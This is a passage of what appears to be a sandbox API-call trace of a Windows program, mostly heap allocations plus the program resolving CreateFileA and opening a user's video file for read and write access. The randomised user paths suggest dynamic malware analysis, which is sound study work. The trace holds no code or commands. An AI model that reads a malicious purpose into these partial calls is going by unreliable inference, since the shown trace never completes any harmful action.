Flags=0x0, Size=0x10) returned 0x889dd8 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.063] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.065] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca18 [0042.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.066] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0042.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ca18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.066] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0042.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", cchWideChar=68, lpMultiByteStr=0x88e138, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", lpUsedDefaultChar=0x0) returned 68 [0042.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0042.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.068] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\0bc6y2qc_04ddnddghl.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x88) returned 0x7bbc00 [0042.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=68, lpWideCharStr=0x7bbc00, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv") returned 68 [0042.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0042.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0042.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.069] RtlAllocateHeap 